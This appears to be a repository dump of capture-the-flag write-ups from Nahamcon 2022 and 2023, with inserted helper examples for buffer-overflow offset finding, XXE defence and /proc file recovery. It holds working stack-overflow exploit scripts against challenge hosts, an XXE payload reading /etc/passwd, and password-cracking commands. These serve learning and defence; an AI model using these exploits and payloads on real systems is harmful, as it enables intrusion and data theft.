-------------------------------------------------------------------------------- /Huntress-CTF-2024/challenge-files/calc.zip: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/Huntress-CTF-2024/challenge-files/calc.zip
-------------------------------------------------------------------------------- /Huntress-CTF-2024/challenge-files/challenge: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/Huntress-CTF-2024/challenge-files/challenge
-------------------------------------------------------------------------------- /Huntress-CTF-2024/challenge-files/challenge-hidden-streams.zip: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/Huntress-CTF-2024/challenge-files/challenge-hidden-streams.zip
-------------------------------------------------------------------------------- /Huntress-CTF-2024/challenge-files/challenge-palimpsest.zip: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/Huntress-CTF-2024/challenge-files/challenge-palimpsest.zip
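For babybufov.c listed above the page gives no solve script, so here is the part that is not obvious from the source: the distance from `buf` to the saved return address depends on how the compiler laid out the frame, not just on `char buf[16]`. The usual way to measure it is a De Bruijn pattern. This is an added example, not the challenge author's code; `TARGET` is a placeholder for the address of `target()` (read yours with `nm babybufov`), and the "crash value" in the test is constructed, standing in for what gdb shows in EIP. With `width=8` the same helpers produce the 120-byte layout used by the Babiersteps script further down this page.

```python
"""Find the padding length for a gets() stack overflow with a De Bruijn pattern.
Added example, not the challenge's solve script. babybufov.c is compiled -m32
with no canary and no PIE, so the exploit is padding + a fixed 4-byte address."""
import string


def de_bruijn(alphabet: str = string.ascii_lowercase, n: int = 4, length: int = 200) -> bytes:
    """Prefix of the De Bruijn sequence B(k, n) over `alphabet`: every n-byte
    window occurs at most once, so the 4 bytes that land in EIP identify exactly
    one offset. Standard FKM construction, the same idea as pwntools' cyclic()."""
    k = len(alphabet)
    a = [0] * (k * n)
    seq = []

    def db(t, p):
        if len(seq) >= length:      # stop early; the prefix is all we need
            return
        if t > n:
            if n % p == 0:
                seq.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return "".join(alphabet[i] for i in seq[:length]).encode()


def find_offset(pattern: bytes, crash_value: int) -> int:
    """Map the value that ended up in EIP after the crash back to its position
    in the pattern. Only the low 4 bytes are used: on 64-bit a non-canonical
    address faults before RIP is loaded, so you read the value from the top of
    the stack instead, and 4 bytes are enough to locate it."""
    needle = (crash_value & 0xFFFFFFFF).to_bytes(4, "little")
    idx = pattern.find(needle)
    if idx < 0:
        raise ValueError("crash value is not part of the pattern")
    return idx


def build_payload(offset: int, target_addr: int, width: int = 4) -> bytes:
    """Padding up to the saved return address, then the win function's address
    little-endian, the same layout as the Babiersteps script on this page."""
    return b"A" * offset + target_addr.to_bytes(width, "little")


if __name__ == "__main__":
    # Workflow: feed the pattern to the binary under gdb, read EIP at the crash,
    # compute the offset, then build the real payload for the remote target.
    pattern = de_bruijn()
    eip_at_crash = int.from_bytes(pattern[28:32], "little")  # constructed: as if gdb showed this
    offset = find_offset(pattern, eip_at_crash)
    TARGET = 0x08049196  # placeholder for the address of target(); not from the challenge
    print(offset, build_payload(offset, TARGET).hex())
```

Feed `de_bruijn()` to the binary with `gdb -q ./babybufov`, `run < pattern.bin`, note EIP, and `find_offset` returns the padding; the payload then needs a trailing newline (`sendline` in pwntools) so `gets()` returns.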
-------------------------------------------------------------------------------- /Huntress-CTF-2024/challenge-files/challenge-rustline.zip: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/Huntress-CTF-2024/challenge-files/challenge-rustline.zip
-------------------------------------------------------------------------------- /Huntress-CTF-2024/challenge-files/echo_chamber.pcap: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/Huntress-CTF-2024/challenge-files/echo_chamber.pcap
-------------------------------------------------------------------------------- /Huntress-CTF-2024/challenge-files/eepy.zip: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/Huntress-CTF-2024/challenge-files/eepy.zip
-------------------------------------------------------------------------------- /Huntress-CTF-2024/challenge-files/keyboard_junkie: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/Huntress-CTF-2024/challenge-files/keyboard_junkie
-------------------------------------------------------------------------------- /Huntress-CTF-2024/challenge-files/little_shop_of_hashes_logs.zip: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/Huntress-CTF-2024/challenge-files/little_shop_of_hashes_logs.zip
-------------------------------------------------------------------------------- /Huntress-CTF-2024/challenge-files/logs-parts1-5.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/Huntress-CTF-2024/challenge-files/logs-parts1-5.zip
-------------------------------------------------------------------------------- /Huntress-CTF-2024/challenge-files/qrcode.png: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/Huntress-CTF-2024/challenge-files/qrcode.png
-------------------------------------------------------------------------------- /Huntress-CTF-2024/challenge-files/russian_roulette.zip: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/Huntress-CTF-2024/challenge-files/russian_roulette.zip
-------------------------------------------------------------------------------- /Huntress-CTF-2024/challenge-files/stack_it.bin: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/Huntress-CTF-2024/challenge-files/stack_it.bin
-------------------------------------------------------------------------------- /Huntress-CTF-2024/challenge-files/transmissions.wav: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/Huntress-CTF-2024/challenge-files/transmissions.wav
-------------------------------------------------------------------------------- /Huntress-CTF-2024/challenge-files/x-ray.7z: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/Huntress-CTF-2024/challenge-files/x-ray.7z
-------------------------------------------------------------------------------- /Huntress-CTF-2024/challenge-files/zulu: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/Huntress-CTF-2024/challenge-files/zulu
-------------------------------------------------------------------------------- /Nahamcon-2022/A Wild Ride.md: --------------------------------------------------------------------------------
![image](https://user-images.githubusercontent.com/80063008/166223740-61c99cee-1616-4ea9-a880-5df99d6df6fe.png)

Trying to unzip the file, we are prompted for a password. We can use zip2john to extract the hash and then pass it to john to be cracked.

```bash
zip2john gpx.zip > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt
```

![image](https://user-images.githubusercontent.com/80063008/166223937-6e28b0a5-daba-4b25-8ec6-1b4036cc5e88.png)

After we crack the password we are able to unzip it and we get a lot of .gpx files, 252 to be exact.

![image](https://user-images.githubusercontent.com/80063008/166223983-e60380b4-754f-46f1-aee3-2b605e3cf015.png)

After a bit of research on what this file type is (GPX is an XML format for GPS tracks and waypoints), we come across a website called https://gpx.studio/. We can simply drag and drop all of the files at once and it will plot the tracks they contain.

![image](https://user-images.githubusercontent.com/80063008/166224066-65b5fd92-e0ec-4ce9-81d0-1ba4c79113db.png)

Zooming in and out for a bit allows us to see the flag.
![image](https://user-images.githubusercontent.com/80063008/166224174-de211a3f-9e21-4971-a0e2-64a927d41321.png)

flag{gpx_is_cool}
-------------------------------------------------------------------------------- /Nahamcon-2022/Babiersteps.md: --------------------------------------------------------------------------------
![image](https://user-images.githubusercontent.com/80063008/166221564-c62ee6ce-bd6e-4a01-99ca-8a2da4bc664c.png)

Opening the binary in Ghidra we can see that it reads input into a 112-byte buffer.

![image](https://user-images.githubusercontent.com/80063008/166223098-a7658974-9274-4b9c-98ba-97fba7bf1354.png)

We see it also has a win function.

![image](https://user-images.githubusercontent.com/80063008/166223171-8188f335-5a11-40f1-9a9f-aa77a5a1f325.png)

We can overflow it with 120 As (the 112-byte buffer plus the 8-byte saved rbp) and then return to the win function, which executes /bin/sh. Here is the Python script for it:

```python
from pwn import *

target = remote("challenge.nahamcon.com", 31373)
elf = ELF("./babiersteps")          # non-PIE binary, so the symbol address is usable as-is

payload = b"A" * 120                # fill the 112-byte buffer and the saved rbp
payload += p64(elf.symbols['win'])  # overwrite the saved return address with win()

target.sendline(payload)            # the trailing newline terminates the line-based read
target.interactive()
```

![image](https://user-images.githubusercontent.com/80063008/166223260-e9017084-0768-490d-a16a-2ec28cc78ede.png)
-------------------------------------------------------------------------------- /Nahamcon-2022/Baby RSA Quiz.md: --------------------------------------------------------------------------------
![image](https://user-images.githubusercontent.com/80063008/166223338-fe251823-f500-44b5-a98b-435158b68c60.png)

When connecting to the challenge we see we have some options.

![image](https://user-images.githubusercontent.com/80063008/166223379-514c8bf6-5482-40ee-bba2-ccde34d7dff0.png)

Choosing option 0 gives us a tutorial on RSA cryptography. Choosing option 1 starts the quiz.
We first get a short n, e and ct.

![image](https://user-images.githubusercontent.com/80063008/166223479-bb50e097-14e3-4d79-a19b-f59dbe25e1af.png)

We can pass those to [RsaCtfTool](https://github.com/Ganapati/RsaCtfTool) and it will do the work for us: with a 47-bit modulus, factoring n and recovering the private exponent is trivial.

```bash
./RsaCtfTool.py -n 124762191422189 -e 65537 --uncipher 64370744219044
```

![image](https://user-images.githubusercontent.com/80063008/166223577-00d77f08-28c2-4d84-92fa-0726d925d364.png)

We need to provide the answer as the big-endian bytes of the decrypted integer. Repeat this two more times and we get the flag.

![image](https://user-images.githubusercontent.com/80063008/166223615-ac76ff60-cdea-4fba-9553-63a1927230a7.png)
-------------------------------------------------------------------------------- /Nahamcon-2022/Cereal.md: --------------------------------------------------------------------------------
![image](https://user-images.githubusercontent.com/80063008/166224704-210f794b-bf43-4981-9ef6-48a9857f3509.png)

Running the file command on this we can see it is an archive.

![image](https://user-images.githubusercontent.com/80063008/166225133-2598d379-7f3c-41d5-ad3a-fe987cfc556d.png)

We unarchive it and get a few other files. The meta.json file contains a lot of data that we don't need to parse through. Running file on the .bin files only reports "data", which doesn't help.

![image](https://user-images.githubusercontent.com/80063008/166225184-3f841175-89e2-4682-9a85-6d5ae3637191.png)

However, if we try to read one of the .bin files, we can see a strange file header.

![image](https://user-images.githubusercontent.com/80063008/166225361-30784b88-55f3-47e3-bd56-4f85ca007fad.png)

We can google it and find a software called Logic Analyzer.
![image](https://user-images.githubusercontent.com/80063008/166225545-9a492aea-63c4-47d8-9010-226ad71e2a9d.png)

I was lucky to be familiar with this file type as I have encountered it in a past CTF. I already had the software installed, so we can go ahead and open the .sal file using [Logic Analyzer](https://www.saleae.com/downloads/) from Saleae.

![image](https://user-images.githubusercontent.com/80063008/166225706-fba7cd57-9d31-4f82-a28f-665afefe32e0.png)

There's a little something extra after the flag which I'll let you discover on your own :))

flag{5c4596b35aeb122209b34cccfcdb56c1}
-------------------------------------------------------------------------------- /Nahamcon-2022/Crash Override.md: --------------------------------------------------------------------------------
![image](https://user-images.githubusercontent.com/80063008/166219643-55c3b9e8-2cde-4e75-8656-7a6c7b7f9d0d.png)

We get the source code of the binary that runs on the server.

![image](https://user-images.githubusercontent.com/80063008/166219799-a147b426-68d2-42b9-9c3f-c471d2d9bfa6.png)

It reads input into a 2048-byte buffer, and on a segfault it goes to the win function, which prints the flag. So all we need is a crash: send more than 2048 bytes, for example 2100 A characters generated with Python, and the flag comes back.

```bash
python3 -c "print('A' * 2100)" | nc challenge.nahamcon.com 32129
```

![image](https://user-images.githubusercontent.com/80063008/166219908-77eb78b3-4034-4a73-b9f5-38e1226c0b75.png)
-------------------------------------------------------------------------------- /Nahamcon-2022/EXtravagant.md: --------------------------------------------------------------------------------
![image](https://user-images.githubusercontent.com/80063008/166220640-885ce522-4863-42be-b548-be492481e0ef.png)

The home page looks like this. When I see XML, I immediately think XXE.
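What that hunch means in code, as an added example (not the challenge's parser, which the page only shows through screenshots): `XXE_PAYLOAD` is a constructed document of the same shape as the standard file-read payload, and `parse_without_dtd` is the server-side fix, an expat parser that refuses any upload carrying a DOCTYPE. Element and file names here are made up for the example.

```python
"""XXE: the malicious upload, and a parser that refuses DTDs outright
(added example, not the challenge's code)."""
import xml.parsers.expat

# Constructed payload in the shape of the classic file-read XXE: a DOCTYPE that
# declares an external entity pointing at a local file, then references it.
XXE_PAYLOAD = (
    '<?xml version="1.0"?>\n'
    '<!DOCTYPE data [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>\n'
    '<data><note>&xxe;</note></data>\n'
)

# Constructed benign upload of the same shape, no DOCTYPE.
BENIGN_UPLOAD = '<?xml version="1.0"?>\n<data><note>hello</note></data>\n'


class DoctypeRejected(ValueError):
    pass


def parse_without_dtd(xml_text: str) -> dict:
    """Parse an upload and return {tag: text} for its leaf elements, refusing
    any document that carries a DOCTYPE. Entities (internal, external or
    parameter) can only be declared inside a DTD, so rejecting the DTD up front
    removes XXE and billion-laughs in one check instead of auditing every
    parser feature flag."""
    parser = xml.parsers.expat.ParserCreate()
    leaves = {}
    text_buf = []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # Raised from inside the handler, so parsing aborts before any entity
        # declaration in the internal subset is even seen.
        raise DoctypeRejected(f"DOCTYPE {name!r} not allowed in uploads")

    def on_start(tag, attrs):
        text_buf.clear()

    def on_chars(data):
        text_buf.append(data)

    def on_end(tag):
        text = "".join(text_buf).strip()
        if text:
            leaves[tag] = text
        text_buf.clear()

    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = on_start
    parser.CharacterDataHandler = on_chars
    parser.EndElementHandler = on_end
    parser.Parse(xml_text, True)
    return leaves


def is_xxe_attempt(xml_text: str) -> bool:
    """Classifier for a WAF rule or an upload-time log line."""
    try:
        parse_without_dtd(xml_text)
    except DoctypeRejected:
        return True
    return False
```

If a DTD has to be accepted for legitimate reasons, the narrower settings are to disable external entity resolution and entity expansion in whichever parser is in use (for lxml, `resolve_entities=False`); rejecting the DOCTYPE is the simplest rule when uploads never need one.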
![image](https://user-images.githubusercontent.com/80063008/166220669-54f5bd9f-6d23-472b-91d8-3b9bbba1b2ab.png)

On the /trial endpoint we can upload a file.

![image](https://user-images.githubusercontent.com/80063008/166220746-b6a9b679-4bb5-43b9-acc3-d03d02408a44.png)

And on the /view endpoint we can view the file we uploaded.

![image](https://user-images.githubusercontent.com/80063008/166220792-6c40e49a-50c3-47b4-8f1f-eeae545a3438.png)

To make experimentation easier, I intercepted requests using Burp Suite. I first uploaded a standard XXE payload to read a file: a DOCTYPE declaring an external entity with a `file://` URI, referenced from the document body. If the parser resolves external entities, the file content is substituted in when the document is rendered on /view.

![image](https://user-images.githubusercontent.com/80063008/166220858-55272441-120c-45d0-9418-9769ed09cf13.png)

The request to view the file was successful and we have the passwd file.

![image](https://user-images.githubusercontent.com/80063008/166424810-1b1a2d2f-17cf-4b11-935f-ca4ed0f26f2e.png)

As the description states, the flag is in /var/www, so we change our payload to read that file.

![image](https://user-images.githubusercontent.com/80063008/166220991-a8abd195-24e5-446f-883d-5cacb8d3bf8e.png)

And we get the flag.

![image](https://user-images.githubusercontent.com/80063008/166221008-e3945ae4-1037-4c3f-8e4b-cee91e369843.png)
-------------------------------------------------------------------------------- /Nahamcon-2022/Jurassic Park.md: --------------------------------------------------------------------------------
![image](https://user-images.githubusercontent.com/80063008/166221111-b8138d0f-b89e-4a02-acba-06bbebe46b08.png)

Interesting looking homepage.

![image](https://user-images.githubusercontent.com/80063008/166221159-4c72df02-bcc8-49ae-9e2b-ad47a2cdf0fd.png)

I usually use Burp Suite to intercept requests when I'm first visiting a website. It automatically looks for usual things like robots.txt, which we find here as well.
![image](https://user-images.githubusercontent.com/80063008/166221280-3b9eabd4-4877-47e1-9e5e-67a1dacf935e.png)

Going to the endpoint listed there, we see a flag.txt file.

![image](https://user-images.githubusercontent.com/80063008/166221302-433b1f30-439d-4143-98ca-1cc0c19dfec3.png)

Which we can read to get the flag.

![image](https://user-images.githubusercontent.com/80063008/166221325-81dcadcc-17cd-4c33-afb7-58451019fe33.png)
-------------------------------------------------------------------------------- /Nahamcon-2022/Mobilize.md: --------------------------------------------------------------------------------
![image](https://user-images.githubusercontent.com/80063008/166224279-85ebc6d2-611a-4078-9be5-2190141efc45.png)

To decompile the apk file we can use a tool called jadx.

```bash
sudo apt install jadx
jadx -d /tmp/decompiled_folder /tmp/mobilize.apk
```

From inside the decompiled folder, a recursive grep search quickly finds the flag:

```bash
grep -Rn "flag{.*}"
```

![image](https://user-images.githubusercontent.com/80063008/166224542-862b4d90-6c8f-4198-877b-b0180b24ea46.png)

It is in /resources/res/values/strings.xml, the app's string resources, which are a common place to find hardcoded secrets.

![image](https://user-images.githubusercontent.com/80063008/166224597-29732781-469b-498c-92ff-854b5de64214.png)
-------------------------------------------------------------------------------- /Nahamcon-2022/Quirky.md: --------------------------------------------------------------------------------
![image](https://user-images.githubusercontent.com/80063008/166220014-01c95cab-cc2d-4c2e-9882-fff645883735.png)

Reading the file we are given, we see a bunch of hex.

![image](https://user-images.githubusercontent.com/80063008/166220052-fd8c4168-edaf-434e-9d0c-1554c16b0a03.png)

Each byte is written as a `\x`-escaped pair, so we can use sed to strip the `\x` prefixes and then xxd to turn the remaining hex back into bytes.
```bash
cat quirky | sed 's/\\x//g' | xxd -r -p
```

Based on the file header, we can tell this is supposed to be a PNG file.

![image](https://user-images.githubusercontent.com/80063008/166220232-0bf49fa6-de76-40d8-89d2-58bf1101a59a.png)

Redirecting that output to a file, we can see it's a QR code.

![image](https://user-images.githubusercontent.com/80063008/166220554-13d58a02-f262-4069-8fbf-f1cb14ed299b.png)

We can decode QR codes directly in the terminal using zbarimg. So putting it all together, we can use a bash one-liner to get the flag (`&&` runs zbarimg once the PNG has been written; piping a redirected command would hand zbarimg an empty stream):

```bash
cat quirky | sed 's/\\x//g' | xxd -r -p > pic.png && zbarimg -q pic.png | awk -F ":" '{print $2}'
```

![image](https://user-images.githubusercontent.com/80063008/166220479-96f3adc7-203d-4c78-a263-de8cf854f1c0.png)
-------------------------------------------------------------------------------- /Nahamcon-2022/Steamy Locomotive.md: --------------------------------------------------------------------------------
![image](https://user-images.githubusercontent.com/80063008/166219202-034f004e-ddb7-4046-9c99-5faff50a4ce7.png)

When we log in we get an animation of a locomotive crossing the screen.

![image](https://user-images.githubusercontent.com/80063008/166219241-34c3acba-d35d-4e46-a34e-d3724021d2c0.png)

And when it's off the screen, the session closes:

![image](https://user-images.githubusercontent.com/80063008/166219266-d1a6040a-e0ee-47ad-8064-2a7aa78b122a.png)

If we type commands before the train comes in, they still get executed, so we have command execution.

![image](https://user-images.githubusercontent.com/80063008/166219486-73b13274-dfdc-477a-a9a9-7b27a60a0515.png)

So we can read the flag now.
![image](https://user-images.githubusercontent.com/80063008/166219413-f2040185-8fb8-4835-aa1e-00cebac9e656.png)
-------------------------------------------------------------------------------- /Nahamcon-2022/The Balloon.md: --------------------------------------------------------------------------------
![image](https://user-images.githubusercontent.com/80063008/166218504-93323106-89e3-4cf9-b33e-b35eed252209.png)

After we download the file, we can read it and see a potential link in it.

![image](https://user-images.githubusercontent.com/80063008/166218543-ab1fd4b6-d3f0-4ee1-beaa-570e62463799.png)

It seems to be rotated, and after some experimentation we find that rotating it by 11 with `caesar` gives a proper link.

```bash
cat theballoon | caesar 11
```

![image](https://user-images.githubusercontent.com/80063008/166218614-57fe8ba7-faba-4105-a573-1f886b1a2d2f.png)

We can curl that down and see a strange string.

```bash
curl https://pastebin.com/eLBePZEy
```

![image](https://user-images.githubusercontent.com/80063008/166218694-f19da111-c9d5-4866-aa70-6ff641b68bf1.png)

It took me a while to figure out what this string is since it's not something I had seen often until now. However, the repeated mentions of the word 'inflate' made me experiment with CyberChef, and Raw Inflate (DEFLATE data without the zlib header) gets us the flag.

![image](https://user-images.githubusercontent.com/80063008/166218885-54272117-4285-4974-93e2-fad4fd4b2a02.png)
-------------------------------------------------------------------------------- /Nahamcon-2023/Forensics/Fetch.md: --------------------------------------------------------------------------------
# Fetch

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/81f3d65d-ec8d-4e40-b01b-31deadfd6508)

For this challenge we get a file I hadn't seen before.
A Windows Imaging (WIM) file:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/876185c6-113f-4bb2-9244-07c925fa495d)

After some research with Google, we find that there are tools we can use to parse these on Linux and on Windows. Initially I installed `wimtools` (which provides `wimlib-imagex`).

```bash
sudo apt-get install wimtools
```

After that I mounted it to a folder and found a bunch of prefetch files:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/2e676c67-295f-4fad-9bd7-332e957c137e)

I read some articles trying to find some easy ways of parsing the information in these files, as there were quite a few: a real "needle in a haystack" situation.

https://www.hackingarticles.in/forensic-investigation-prefetch-file/

Eventually I found this Windows tool, as it was easier for me to have a GUI in this instance:
https://www.nirsoft.net/utils/win_prefetch_view.html

My aim was to look into the prefetch files of programs that take user input, like notepad, cmd and powershell, since a prefetch file records the files and directories an executable touched during its first seconds. Eventually I found wordpad:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/a6a290f1-a776-4c5e-9101-2ac88c297995)

I used CyberChef to quickly convert it to lowercase:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/f8c11c07-5aa0-481b-8ce2-d21765726706)

flag{97f33c9783c21df85d79d613b0b258bd}
-------------------------------------------------------------------------------- /Nahamcon-2023/Forensics/Perfectly_Disinfected.md: --------------------------------------------------------------------------------
# Perfectly Disinfected

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/0e59b99d-dfec-4fb3-9ecd-1da1e1bcd74e)

This was a very easy one for me as I already had a tool installed that's very good at finding hidden stuff in PDFs.
I've used [PDFStreamDumper](https://pdfstreamdumper.software.informer.com/) before in other CTFs, and it found the flag for me right away in the first item in the list, in the Title:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/6ed1fdda-b590-46d7-8e95-0a21320badda)

flag{b00acdc78749b378f8f4889f8243789304abe928}
-------------------------------------------------------------------------------- /Nahamcon-2023/Geosint.md: --------------------------------------------------------------------------------
# Chall1

We are in Singha Park Khon Kaen Golf Club in Thailand.

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/c2c17820-fbc3-4831-8e77-6cffae308540)

# Chall2

We are in Portoferraio, Province of Livorno, Italy.

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/07d0d080-6607-4c71-8d2a-810254e74df7)
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/5bddc0a3-543d-4b1c-933b-f02087d9a92f)

# Chall3

We are in Central Park, New York, on the Sheep Meadow lawn.

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/3c91490c-afa3-475e-99ed-74807beac557)

# Chall4

We are in Ebenfurth train station, Austria.
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/a09484fe-b5b9-4594-8976-e04238ed9ea8)
-------------------------------------------------------------------------------- /Nahamcon-2023/Misc/Zombie.md: --------------------------------------------------------------------------------
# Zombie

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/d0349306-c955-42cc-ab42-38c618235a16)

This challenge allows us to SSH into a box, where we find a script we can read to better understand what is going on:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/7a67c836-0bcd-4302-97c7-682939102ae7)

It seems the user runs tail on the flag and then deletes it. However, the process is still running in the background:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/0eb141b1-7ff5-4a8a-b732-6f776a2d7a3b)

Unlinking a file only removes its directory entry; the inode stays allocated for as long as some process holds it open. Because tail still has the flag open, we can read it through that process's file descriptor table under `/proc/<PID>/fd`.

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/722f45e8-32d7-489f-a903-bce368c4c885)

And indeed, we get the flag:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/9b9d1058-380a-4f47-a1a8-c6bf0b110680)

flag{6387e800943b0b468c2622ff858bf744}
-------------------------------------------------------------------------------- /Nahamcon-2023/README.md: --------------------------------------------------------------------------------
This was another very fun Nahamcon CTF. I finished 98th as a one-man show/team, which is the top 3.88% of the teams.
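For the Zombie challenge above, the same recovery done from a script rather than by hand. This is an added example and not the challenge's code; it is Linux-only (it relies on the `/proc/<pid>/fd` symlinks), and `demo()` constructs the scenario itself, with our own process standing in for the lingering tail and a made-up flag string:

```python
"""Recover a deleted-but-still-open file through /proc (added example; not the
challenge's script). Linux only: it relies on /proc/<pid>/fd symlinks."""
import os
import tempfile


def deleted_open_files(pid: int) -> list:
    """Return (fd, path) pairs for descriptors of `pid` whose target was unlinked.
    The kernel appends ' (deleted)' to the link text once the last directory
    entry is gone, but the inode stays alive until every descriptor closes."""
    fd_dir = f"/proc/{pid}/fd"
    hits = []
    for name in os.listdir(fd_dir):
        try:
            target = os.readlink(os.path.join(fd_dir, name))
        except OSError:  # descriptor closed between listdir and readlink
            continue
        if target.endswith(" (deleted)"):
            hits.append((int(name), target[:-len(" (deleted)")]))
    return hits


def read_deleted(pid: int, fd: int) -> bytes:
    """Open the /proc symlink itself: that reopens the inode, not the path,
    so the content comes back even though the name no longer resolves."""
    with open(f"/proc/{pid}/fd/{fd}", "rb") as f:
        return f.read()


def demo() -> bytes:
    """Constructed scenario mirroring the challenge: a process (here, ourselves)
    opens a file, the file is deleted, and the content is recovered via /proc."""
    tmp = tempfile.NamedTemporaryFile(mode="w+b", delete=False)
    tmp.write(b"flag{constructed_example_flag}\n")  # constructed, not the real flag
    tmp.flush()
    os.unlink(tmp.name)  # same effect as the challenge's rm
    try:
        hits = deleted_open_files(os.getpid())
        fd = next(fd for fd, path in hits if path == tmp.name)
        return read_deleted(os.getpid(), fd)
    finally:
        tmp.close()


if __name__ == "__main__":
    print(demo().decode().strip())
```

Against another user's process you need the same UID or `CAP_SYS_PTRACE` to read its `/proc/<pid>/fd`, which is exactly why the challenge leaves tail running as the user you log in as; for incident response the same scan over every pid is a quick way to find malware that deleted its own binary or log files after opening them.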
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/c1abce45-2196-421e-a2dd-f2b43afe6cf5)
-------------------------------------------------------------------------------- /Nahamcon-2023/Warmups/Glasses.md: --------------------------------------------------------------------------------
# Glasses

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/30535159-715f-4628-8251-7cfbc94fb022)

When checking the source code of this web application, I noticed a large blob in the HTTP response in Burp Suite:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/02c0e735-6415-49e6-8b89-70df0069379b)

Scrolling all the way down, we can see it's actually JavaScript. I tried multiple ways to run it, in the browser console, beautifying it and running it in online parsers, but the output was too large and I couldn't get all of it.

So I resorted to saving it locally in a file and changing it a bit to print the code:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/0431ba0a-a95a-478f-abd8-2c29a654f0a5)

Then I used node to run the JavaScript and redirect the output to a file. Again, there was a lot of content (garbage), but a simple CTRL+F helps us find the flag:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/6aba3aaf-8460-471a-a26e-53c0ec18162f)

flag{8084e4530cf649814456f2a291eb81e9}
-------------------------------------------------------------------------------- /Nahamcon-2023/Warmups/Online_Chatroom.md: --------------------------------------------------------------------------------
# Online Chatroom

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/250d063c-9781-4609-a39d-ab83e43d2a1f)

For this challenge, we get the source code of a Go binary. We notice some chat messages going on, and the flag is within the chat history of user 5.
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/211730c1-8070-4b84-9fd9-6cc1ace0c115)

Sending a simple message in the web application:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/fb992564-1a32-4de9-8c18-b2dfe236ac10)

And intercepting it with Burp Suite, we notice it is using WebSockets:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/58b00757-2dfd-4ed4-87e8-8f6b96b9632c)

In the source code, we notice another command besides `!write`: we can query the chat history using `!history`. After sending the request to Repeater, we see we need to provide an index from 1 to 7.

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/c85a6b86-7c69-4915-bee7-c71f62b77653)

Well, what happens if we query outside of that range? The server evidently does not enforce it: an index outside the advertised range returns the history that was supposed to stay hidden.

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/d2255c17-256e-4bc3-80a7-12229e5cb36e)

We get the flag: flag{c398112ed498fa2cacc41433a3e3190b}
-------------------------------------------------------------------------------- /Nahamcon-2023/Web/Star_Wars.md: --------------------------------------------------------------------------------
# Star Wars

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/5ff560df-35ba-4b8f-b713-2508a4a03b06)

For this website, we can sign up for an account and then log in. When we do, we see we can post comments, and it says that the admin will review them (smells like XSS).
